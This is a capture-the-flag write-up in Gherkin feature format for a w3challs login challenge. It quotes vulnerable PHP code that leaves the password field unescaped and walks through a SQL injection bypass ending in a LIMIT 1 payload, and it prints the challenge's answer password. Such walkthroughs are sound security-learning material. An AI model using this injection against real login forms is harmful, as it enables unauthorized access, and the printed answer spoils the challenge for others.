## Version 2.0
## language: en

Feature: 35-hacking-w3challs
  Code:
    35
  Site:
    w3challs
  Category:
    hacking
  User:
    edr3mo
  Goal:
    Get the password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Linux Mint      | Tessa 19.1  |
    | Mozilla Firefox | 66.0.2      |
    | Sublime Text    | 3.2.1       |
  Machine information:
    Given the challenge URL
    """
    https://w3challs.com/challenges/challenge35
    """
    When I see a new link to access the challenge
    And I see a link to download the source code
    Then I download the source code of the challenge
    Then I open the link to access the challenge
    """
    http://basicvuln.hacking.w3challs.com/
    """
    Then I see a login page with the fields Login and Password

  Scenario: Fail:SQL injection
    Given I download the source code
    When I review the file index.php
    And I see the following code
    """
    $auth = FALSE;
    if (isset($_POST['login'], $_POST['password']) &&
    is_string($_POST['login']) && is_string($_POST['password']))
    {
        $con = mysql_connect(BDD_HOST, BDD_USER, BDD_PASSWORD);
        mysql_select_db(BDD_DATABASE, $con);

        $query = sprintf("SELECT * FROM haxorz_memberz
        WHERE login = '%s' AND password = MD5('%s')",
        mysql_real_escape_string($_POST['login']),
        $_POST['password']);
        $sql = mysql_query($query);

        if (@mysql_num_rows($sql) == 1)
            $auth = TRUE;
        else
            printf(fail);
    }

    if ($auth)
    {
        printf(greetz, CHALLENGE_PASSWORD);
    }
    """
    Then I can see the password field does not escape especial characters
    Then I use the following sql injection with two hyphens and a space
    """
    ') OR '1' = '1' --
    """
    Then the SQL query is
    """
    $query = sprintf("SELECT * FROM haxorz_memberz
    WHERE login = '%s' AND password = MD5('') OR '1' = '1'-- ')",
    mysql_real_escape_string($_POST['login']),
    $_POST['password']
    );
    """
    And It doesn't work
    And I don't solve the challenge

  Scenario: Success:SQL injection
    Given the previous SQL injection
    When I review the code again
    And I see the following code
    """
    45 if ($auth)
    46 {
    47    printf(greetz, CHALLENGE_PASSWORD);
    48 }
    """
    Then I see the following code
    """
    39 if (@mysql_num_rows($sql) == 1)
    40     $auth = TRUE;
    """
    Then I conclude I need to return just one record
    Then I use LIMIT 1 to return one column
    """
    $query = sprintf("SELECT * FROM haxorz_memberz
    WHERE login = '%s' AND password = MD5('') OR '1' = '1'
    LIMIT 1-- ')",
    mysql_real_escape_string($_POST['login']),
    $_POST['password']
    );
    """
    Then I get the following message
    """
    Well done, password is secureYourShitMofo
    """
    And I use this value in the password field at the URL
    """
    https://w3challs.com/challenges/challenge35
    """
    And I solve the challenge
